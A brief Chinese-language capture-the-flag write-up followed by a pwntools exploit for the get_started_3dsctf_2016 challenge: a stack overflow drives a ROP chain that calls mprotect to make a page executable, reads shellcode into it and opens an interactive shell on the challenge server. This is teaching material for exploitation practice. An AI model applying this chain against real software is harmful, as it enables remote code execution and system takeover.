get_started_3dsctf_2016
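mprotect 函数用于修改一段内存页的访问权限(可读/可写/可执行),其起始地址必须按页对齐。下面的 exp 先调用 mprotect 把一页内存改为可读可写可执行,再用 read 把 shellcode 写入该页,最后返回到该页执行。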
exp:
# Exploit script for the get_started_3dsctf_2016 challenge (pwntools).
# Flow as written: overflow a stack buffer, call mprotect() to make one page
# readable/writable/executable, call read() to copy shellcode from stdin into
# that page, then return into it.
#
# NOTE(review): every address below is hard-coded, so the chain only holds if
# the binary is mapped at a fixed base and these functions live inside it
# (presumably a non-PIE, statically linked 32-bit ELF -- confirm with
# checksec). A stack canary, PIE/ASLR, or a policy that refuses PROT_EXEC on
# writable memory would each break one step of this chain.
from pwn import *

context.log_level = 'debug'

# Local run instead of the remote service:
# io = process("./get_started_3dsctf_2016")
io = remote("node4.buuoj.cn", 28786)

# Loaded here but not referenced again in this script.
elf = ELF("./get_started_3dsctf_2016")

# Assembled under the current pwntools context; this script never sets
# context.arch, so the library default applies.
shellcode = asm(shellcraft.sh())

MPROTECT = 0x0806EC80
READ = 0x0806E140
# Target page. mprotect() requires a page-aligned start address, which this
# value satisfies for 0x1000-byte pages.
RWX_PAGE = 0x080EB000
# Used as the return address of each call so that the call's three arguments
# are skipped before the next link runs.
# NOTE(review): that requires a gadget popping three words; the original name
# `pop_ret` suggests a single pop -- confirm against the binary.
ARG_CLEANUP = 0x0804f460

# Presumably the distance from the overflowed buffer to the saved return
# address -- confirm against the binary.
PAD_TO_RET = 56

chain_words = [
    # mprotect(RWX_PAGE, 0x1000, 7); 7 == PROT_READ | PROT_WRITE | PROT_EXEC
    MPROTECT, ARG_CLEANUP, RWX_PAGE, 0x1000, 7,
    # read(0, RWX_PAGE, 0x100); fd 0 is stdin, at most 0x100 bytes are copied
    READ, ARG_CLEANUP, 0, RWX_PAGE, 0x100,
    # final return address: the page that read() has just filled
    RWX_PAGE,
]
payload = b'a' * PAD_TO_RET + b''.join(p32(word) for word in chain_words)

# First line carries the overflow and the chain; the second line is the data
# that the chained read() call consumes.
io.sendline(payload)
io.sendline(shellcode)
io.interactive()